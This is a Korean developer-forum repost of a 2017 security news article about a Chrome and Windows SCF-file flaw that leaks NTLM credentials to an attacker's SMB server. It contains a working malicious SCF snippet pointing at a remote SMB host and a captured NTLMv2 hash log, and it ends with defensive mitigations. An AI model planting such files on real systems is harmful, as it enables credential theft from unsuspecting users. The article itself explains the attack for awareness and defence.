sub_title
 개발자마당
제   목 크롬을 이용해 원격으로 윈도우 패스워드를 훔칠 수 있는 취약점 발견 돼
작성자 고구마 등록일 2017-05-19 09:51:51 조회수 5,425


Beware! Hackers Can Steal Your Windows Password Remotely Using Chrome

 

한 보안 연구원이 구글의 윈도우 모든 버전용 크롬 최신 버전의 디폴트 구성에서 원격의 해커가 사용자의 로그인 크리덴셜을 훔치는데 사용할 수 있는 심각한 취약점을 발견했습니다. 

 

이번에 발견된 취약점은 사용자들이 악성 SCF 파일을 포함하는 웹사이트를 방문하는 것 만으로도 해커가 크롬 및 SMB 프로토콜을 통해 그들 컴퓨터의 로그인 크리덴셜을 훔치도록 허용합니다.

 

이 기술은 새로운 것은 아니며, 이란의 핵 프로그램을 파괴시키도록 특별히 제작 된 강력한 멀웨어인 Stuxnet이 악용한 적 있습니다. Stuxnet은 시스템 해킹을 위해 윈도우의 바로가기 LNK 파일을 사용했습니다. 

 

이 공격이 다른 것들과 다른 점은, SMB 인증 관련 공격이 IE와 Edge 이후 처음으로 구글 크롬에서 시연 되었다는 것입니다.

 

크롬 + SCF + SMB = 윈도우 크리덴셜 훔치기

 

SCF (Shell Command File) 바로가기 파일 포맷은 LNK 파일과 유사하게 동작하며, 바탕화면의 아이콘을 정의하는데 도움을 주는 제한 된 윈도우 익스플로러 명령어 세트를 지원합니다.

 

보안연구원 Stankovic은 블로그를 통해 “현재 공격자는 크롬 최신 버전과 윈도우를 사용하는 피해자가 그의 웹사이트를 방문하도록 유도하기만 하면, 피해자의 인증 크리덴셜을 재사용할 수 있게 된다.”고 밝혔습니다. 

 

기본적으로, 바탕화면의 바로가기 링크들은 아이콘/썸네일의 위치, 프로그램의 이름 및 위치를 정의하는 특정 문법의 shell code를 포함하는 텍스트 파일입니다. 

 

[Shell]

Command=2

IconFile=explorer.exe,3

 

크롬이 윈도우 SCF 파일을 신뢰하기 때문에, 공격자들은 피해자들이 악성 바로가기 파일을 포함한 자신들의 웹사이트로 방문하도록 속이기만 하면 악성 파일은 피해자에게 확인 창도 띄우지 않고 사용자 시스템에 자동으로 다운로드 될 것입니다. 

 

사용자가 다운로드 즉시 또는 나중에 다운로드 파일 폴더를 열기만 하면, 이 파일은 아이콘을 받아오기 위해 사용자가 클릭하지 않아도 자동으로 실행 될 것입니다. 

 

하지만 이 악성 파일은 아이콘 이미지 위치 대신 공격자가 제어하는 원격 SMB 서버의 위치를 포함하고 있습니다.

 

[Shell]

IconFile=\\170.170.170.170\icon

 

즉, SCF 파일이 아이콘 이미지를 받아오려고 시도하는 순간 SMB 프로토콜을 통해 공격자가 제어하는 서버와 자동으로 인증해 피해자의 계정 및 해싱 된 패스워드를 넘겨줘 공격자가 크리데셜을 이용해 피해자의 PC나 네트워크 리소스에 인증하는데 사용할 수 있게 되는 것입니다. 

 

Stankovic은 “아이콘 위치를 원격 SMB 서버로 설정하는 것은 원격 파일 공유와 같은 서비스에 접근할 때 자동으로 인증하는 윈도우의 기능을 악용하는, 이미 알려진 공격 벡터이다.”고 말했습니다.

 

Stuxnet 공격 이후 마이크로소프트는 LNK파일들이 로컬 리소스만 불러오도록 수정했지만, SCF 파일들은 그대로 두었습니다. 

 

 

SCF 파일을 통한 LM/NTLM 해시 인증 악용

 

<이미지 출처 : http://thehackernews.com/2017/05/chrome-windows-password-hacking.html>

 

 

윈도우 PC가 자동으로 크리덴셜을 서버로 넘겨주는 이유는 무엇일까?

 

이는 NTLM 챌린지/응답 인증 메커니즘과 함께 동작하는 SMB 프로토콜을 통한 인증 방식입니다. 즉 LM/NTLM 인증은 아래 4단계로 작동합니다. 

 

1) 윈도우 사용자(클라이언트)가 서버에 로그인을 시도한다.

2) 서버는 챌린지 값으로 응답하며, 사용자에게 챌린지 값을 사용자의 해싱 된 패스워드로 암호화 후 다시 보내라고 요청한다.

3) 윈도우는 클라이언트의 계정 및 해싱 된 패스워드를 서버로 보내 SCF의 요청을 처리한다.

4) 서버는 클라이언트의 해싱 된 패스워드가 맞을 경우 응답을 캡쳐하고 인증을 승인한다.

 

위의 3단계와 같이 윈도우는 자동으로 악성 SMB 서버에 피해자의 계정 및 NTLMv2 패스워드 해시를 제공해 인증하려고 시도할 것입니다. 

 

만약 사용자가 기업 네트워크의 한 부분일 경우, 회사의 시스템 관리자가 해당 사용자에게 할당한 네트워크 크리덴셜들도 공격자에게 보내질 것이며, 피해자가 일반 사용자일 경우, 피해자의 윈도우 계정 및 패스워드가 공격자에게 보내질 것입니다.

 

[*] SMB Captured - 2017-05-15 13:10:44 +0200

NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182

USER:Bosko DOMAIN:Master OS: LM:

LMHASH:Disabled

LM_CLIENT_CHALLENGE:Disabled

NTHASH:98daf39c3a253bbe4a289e7a746d4b24

NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000

00000000000

Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

 

물론 크리덴셜은 암호화 되어있지만, 나중에 플레인 텍스트 형태의 패스워드를 얻기 위해 브루트포싱 공격에 이용될 수 있습니다.

또한 이 연구원은 “폴더의 세팅에 상관없이 SCF 파일은 윈도우 탐색기에서 확장명이 없는 상태로 표시 됩니다. 따라서 picture.jpg.scf 파일은 윈도우 탐색기에서 picture.jpg로 표시 될 것입니다.

 

 

가끔은 암호를 복호화할 필요가 없다

 

다수의 마이크로소프트 서비스들이 해싱 된 상태의 패스워드를 받아들이기 때문에, 공격자는 피해자의 OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live 등에 암호화 된 패스워드로 로그인할 수 있어 복호화 과정이 필요가 없게 됩니다.

 

연구원은 이러한 취약점은 공격자가 조직의 직원들 중 하나로 사칭할 수 있기 때문에 조직에 심각한 위협을 가할 수 있다고 설명했습니다. 공격자가 얻은 권한을 재사용해 나중에 IT 리소스에 접근 및 제어하며 다른 조직원들도 공격하는데 사용할 수 있기 때문입니다. 

 

 

SMB 인증 관련 공격을 예방하는 방법

 

로컬 컴퓨터들이 원격 SMB 서버에 쿼리를 할 수 없도록, 방화벽을 통해 로컬 네트워크로부터 WAN으로의 아웃바운드 SMB 연결(TCP 포트 139 및 445)을 차단하면 됩니다. 

 

또한 구글 크롬에서 설정 -> 고급 설정 보기 -> “다운로드 하기 전 각 파일을 저장할 위치 묻기” 옵션을 선택해 크롬에서 자동으로 다운로드 하지 않도록 설정하는것을 권장합니다.

 

현재 구글은 이 취약점을 이미 알고 있으며 패치를 준비하는 중이라고 밝혔으나, 패치를 언제 제공할지는 밝히지 않았습니다. 



출처: http://blog.alyac.co.kr/1102 [알약 공식 블로그]
 
0
    
 
0
        list
 
※ 짧은 댓글일수록 예의를 갖추어 작성해 주시기 바랍니다.
line
reply cancel
 
번호 제목 글쓴이 추천 조회 날짜
56  APNS, GCM, FCM 푸시 사용시 방화벽 설정 방법   member 기본기 0 / 0 9252 2018-04-26
55  네이티브앱 vs 웹앱 vs 하이브리드앱 장단점을 비교해 봅시다   member 물금 1 / 0 4447 2017-12-03
54  워너크라이(WannaCry)/워너크립터(WannaCryptor) 랜섬웨어 공격예방을 위한 조치.. 이미지   member 고구마 0 / 0 4022 2017-05-21
53  WikiLeaks, CIA의 윈도우 악성코드 프레임워크인 ‘AfterMidnight’, ‘Assassin’ 공..   member 고구마 0 / 0 3535 2017-05-19
52  크롬을 이용해 원격으로 윈도우 패스워드를 훔칠 수 있는 취약점 발견 돼 이미지   member 고구마 0 / 0 5425 2017-05-19
51  모든 OnePlus 기기들에서 패치되지 않은 4개 결점 발견, 원격 공격에 취약 이미지   member 고구마 0 / 0 3228 2017-05-19
50  일본 기업을 타겟으로 하는 CHCHES 악성코드 발견! 이미지   member 고구마 0 / 0 3894 2017-05-19
49  랜섬쉴드 PC 기업용, 개인 사용자에게 무료로 제공! (~ 6/20) 이미지   member 고구마 0 / 0 3309 2017-05-19
48  구형 Embedded 운영체제(Embedded POSReady 2009, Embedded Standard 2009) 보안 업데이트 및.. 이미지   member 고구마 0 / 0 3650 2017-05-15
47  DOCTYPE html Height 100% 안될 시... 조치 방법   member 고구마 0 / 0 4438 2017-05-15
46  Window Server 설치 중 필요한파일 E:Sources/install.wim을(를)열수 없습니다 이미지   member 고구마 0 / 0 4632 2017-05-15
45  비트코인 요구 워너크라이 랜섬웨어 바이러스 예방 방법 이미지   member 고구마 0 / 0 4288 2017-05-15
44  SMSVova 스파이웨어를 숨긴 가짜 앱, 구글 플레이 스토어에서 수년 동안 탐지.. 이미지   member 고구마 0 / 0 3537 2017-05-09
43  패치되지 않은 워드프레스 취약점(CVE-2017-8295), 공격자가 어드민 패스워드 .. 이미지   member 고구마 0 / 0 1916 2017-05-09
42  MySQL Riddle 취약점 발견   member 고구마 0 / 0 2385 2017-05-09
41  Mozilla Firefox 53.0 보안 업데이트 이미지  [1] member 고구마 0 / 0 1897 2017-05-09
40  Adobe ColdFusion 보안 업데이트 권고    member 고구마 0 / 0 1990 2017-05-09
39  Oracle VM VirtualBox 5.1.22 업데이트   member 고구마 0 / 0 3154 2017-05-09
38  우분투/리눅스민트/하모니카 커널 업데이트 4.4.0-77    member 고구마 0 / 0 4230 2017-05-09
37  데비안/LMDE/라즈비안(Raspbian) 커널 업데이트 3.16.43-2    member 고구마 0 / 0 2063 2017-05-09
36  Pawn Storm (폰스톰)이 개방형인증을 이용해 소셜엔지니어링에 공격 이미지   member 고구마 0 / 0 1845 2017-05-06
35  랜섬웨어, 공격 경로 다각화로 맹공 펼친다 이미지   member 고구마 0 / 0 1909 2017-05-06
34  국가별 악성코드 동향 건    member 고구마 0 / 0 1666 2017-05-06
33  실제 SQL 인젝션 공격 체험하기 이미지   member 고구마 1 / 0 2294 2017-05-04
32   파일 암호화 랜섬웨어 자주 묻는 질문   member 고구마 0 / 0 2605 2017-05-04
write
[2] [3] button